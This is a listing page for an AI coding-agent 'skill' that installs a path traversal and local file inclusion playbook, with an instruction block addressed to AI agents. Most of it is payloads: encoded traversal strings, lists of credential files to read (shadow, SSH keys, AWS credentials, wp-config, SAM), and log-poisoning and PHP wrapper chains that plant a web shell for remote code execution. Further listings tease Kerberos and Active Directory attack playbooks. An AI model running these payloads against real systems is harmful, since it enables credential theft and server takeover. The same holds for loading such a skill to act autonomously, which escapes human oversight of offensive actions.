401-403-bypass-techniq…
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
Path traversal and LFI playbook. Use when file paths, download endpoints, include operations, archive extraction, or wrapper behavior may expose filesystem control.
$ npx -y skills add yaklang/hack-skills --skill path-traversal-lfi --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/path-traversal-lfiContext preview
The summary Claude sees to decide when to auto-load this skill.
Path traversal and LFI playbook. Use when file paths, download endpoints, include operations, archive extraction, or wrapper behavior may expose filesystem control.
name: path-traversal-lfi description: >- Path traversal and LFI playbook. Use when file paths, download endpoints, include operations, archive extraction, or wrapper behavior may expose filesystem control.
> **AI LOAD INSTRUCTION**: Expert path traversal and LFI techniques. Covers encoding bypass sequences, OS differences, filter bypass, PHP wrapper exploitation, log poisoning to RCE, and the critical distinction between path traversal (read only) vs LFI (execution). Base models miss encoding chains and RCE escalation paths.
Before deep exploitation, you can first load:
../etc/passwd ../../../../etc/passwd ..%2f..%2f..%2fetc%2fpasswd ..%252f..%252f..%252fetc%252fpasswd ..\\..\\..\\windows\\win.ini
---
**Path Traversal**: Read arbitrary files by escaping the intended directory with `../` sequences. **LFI**: In PHP, when user input controls `include()`/`require()` — file is **executed** as PHP code, not just read.
http://target.com/index.php?page=home → Opens: /var/www/html/pages/home.php Traversal attack: http://target.com/index.php?page=../../../../etc/passwd → Opens: /etc/passwd
---
The filtering strategy determines which encoding to use:
../../../etc/passwd ..\..\..\windows\system32\drivers\etc\hosts (Windows)
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd ← %2f = '/' %2e%2e%5c%2e%2e%5c%2e%2e%5c ← %5c = '\'
%252e%252e%252f%252e%252e%252f ← %25 = %, double-encoded %2e ..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af ← overlong UTF-8 encoding of '/' ..%c1%9c..%c1%9c ← overlong UTF-8 encoding of '\' ..%ef%bc%8f ← fullwidth solidus '/'
..%2F..%2Fetc%2Fpasswd ....//....//etc/passwd ← double-dot with slash (filter strips single ../)
....// ← becomes ../ after filter strips ../ ..././ ← becomes ../ after filter strips ./
../../../../etc/passwd%00.jpg ← %00 truncates string, strips .jpg extension ../../../../etc/passwd%00.php
---
/etc/passwd ← user list (usernames, UIDs) /etc/shadow ← password hashes (requires root-level file read) /etc/hosts ← internal hostnames → pivot targets /etc/hostname ← server hostname /proc/self/environ ← process environment (DB creds, API keys!) /proc/self/cmdline ← process command line /proc/self/fd/0 ← stdin file descriptor /proc/[pid]/maps ← memory maps (loaded libraries with paths) /var/log/apache2/access.log ← for log poisoning /var/log/apache2/error.log /var/log/nginx/access.log /var/log/auth.log ← SSH attempt log /var/mail/www-data ← email for www-data user /home/USER/.ssh/id_rsa ← SSH private key /home/USER/.ssh/authorized_keys /home/USER/.bash_history ← command history (credentials!) /home/USER/.aws/credentials ← AWS keys /tmp/sess_SESSIONID ← PHP session files (if session.save_path=/tmp)
/var/www/html/.env ← Laravel/Node.js env vars /var/www/html/config.php ← PHP config /var/www/html/wp-config.php ← WordPress DB credentials /etc/apache2/sites-enabled/ ← Apache vhosts /etc/nginx/sites-enabled/ ← Nginx config /usr/local/etc/nginx/nginx.conf
C:\Windows\System32\drivers\etc\hosts C:\Windows\win.ini C:\Windows\System32\config\SAM ← NTLM hashes (often locked) C:\inetpub\wwwroot\web.config ← ASP.NET DB connection strings C:\inetpub\wwwroot\global.asa C:\xampp\htdocs\wp-config.php C:\Users\Administrator\.ssh\id_rsa C:\ProgramData\MySQL\MySQL Server 8\my.ini ← MySQL config
---
**Step 1**: Inject PHP code into Apache/Nginx access log via User-Agent:
GET / HTTP/1.1 User-Agent: <?php system($_GET['cmd']); ?>
**Step 2**: Include the log file via LFI:
?page=../../../../var/log/apache2/access.log&cmd=id
Inject PHP payload as SSH username:
ssh '<?php system($_GET["cmd"]); ?>'@target.com
Then include `/var/log/auth.log`.
**Step 1**: Send PHP code in session-stored parameter (e.g., username), triggering storage in session file **Step 2**: Include session file:
?page=../../../../tmp/sess_SESSIONID&cmd=id
Find session ID from cookie `PHPSESSID`.
**`php://expect` wrapper** (requires `expect` PHP extension):
?page=expect://id
**`php://input` wrapper** (combine LFI with POST body):
POST ?page=php://input
Body: <?php system('id'); ?>**`data://` wrapper** (inject PHP directly as base64):
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
(PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= = `<?php system($_GET['cmd']); ?>`)
---
Use `php://filter` to base64-encode file content
Master Entry → Category Entries → Deep Topic Skills One master entry, six category entries, and 102 deep topic skills across 14 security domains.
Repo: yaklang/hack-skills
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
Active Directory ACL abuse playbook. Use when exploiting misconfigured AD permissions including GenericAll, WriteDACL, DCSync rights, shadow credentials, LAPS…
AD Certificate Services attack playbook. Use when targeting misconfigured AD CS for privilege escalation via ESC1-ESC13 template abuse, NTLM relay to…
Kerberos attack playbook for Active Directory. Use when targeting AD authentication via AS-REP roasting, Kerberoasting, golden/silver/diamond tickets,…
AI/ML security playbook. Use when assessing model supply chain attacks (pickle RCE, poisoned weights), adversarial examples, model poisoning, model stealing,…
Android pentesting playbook. Use when testing Android applications for SSL pinning bypass, exported component abuse, WebView vulnerabilities, intent…